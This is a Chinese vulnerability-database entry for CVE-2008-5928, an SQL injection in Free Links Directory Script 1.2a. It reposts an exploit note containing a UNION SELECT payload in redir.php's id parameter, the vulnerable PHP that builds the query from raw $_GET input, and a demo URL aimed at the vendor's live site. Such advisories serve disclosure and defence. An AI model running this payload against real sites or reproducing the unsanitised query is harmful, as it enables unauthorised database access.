flds-script flds SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1183993 漏洞类型 SQL注入
发布时间 2009-01-21 更新时间 2009-01-29
CVE编号 CVE-2008-5928 CNNVD-ID CNNVD-200901-250
漏洞平台 N/A CVSS评分 7.5
|漏洞来源
https://cxsecurity.com/issue/WLB-2009010179
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200901-250
|漏洞详情
FreeLinksDirectoryScript(FLDS)1.2a版本中的redir.php存在SQL注入漏洞。远程攻击者可以借助id参数,执行任意的SQL指令。
|漏洞EXP
#Free Links Directory Script (id) SQL Injection Vulnerability


#Author: nuclear


#site:
http://flds-script.com


#vuln:
http://localhost/[path]/redir.php?id=-1%20UNION%20SELECT%201,2,@@version,4,5,6,7,8,9,10,11/*


#vulnerable code:
$ida = $_GET['id'];
$link = mysql_fetch_array(mysql_query("select * from links where id=$ida"));
$idcheck = mysql_numrows(mysql_query("select * from links where id=$ida"));


#demo:
http://flds-script.com/demo/redir.php?id=-1 UNION SELECT 1,2,@@version,4,5,6,7,8,9,10,11

#notes:
the injection does not work if trying to comment out the rest of the query.The result page will be a 404 but
you can get the data of the injection in the url


#greetz Mi4night, zYzTeM, THE_MAN, Pepe, I-O-W-A, Digitalfortress, DiGitalX, sys32-hack, sys32r, Whitestar

|参考资料

来源:XF
名称:flds-redir-sql-injection(48185)
链接:http://xforce.iss.net/xforce/xfdb/48185
来源:BID
名称:32813
链接:http://www.securityfocus.com/bid/32813
来源:MILW0RM
名称:7453
链接:http://www.milw0rm.com/exploits/7453
来源:SREASON
名称:4929
链接:http://securityreason.com/securityalert/4929
来源:SECUNIA
名称:33075
链接:http://secunia.com/advisories/33075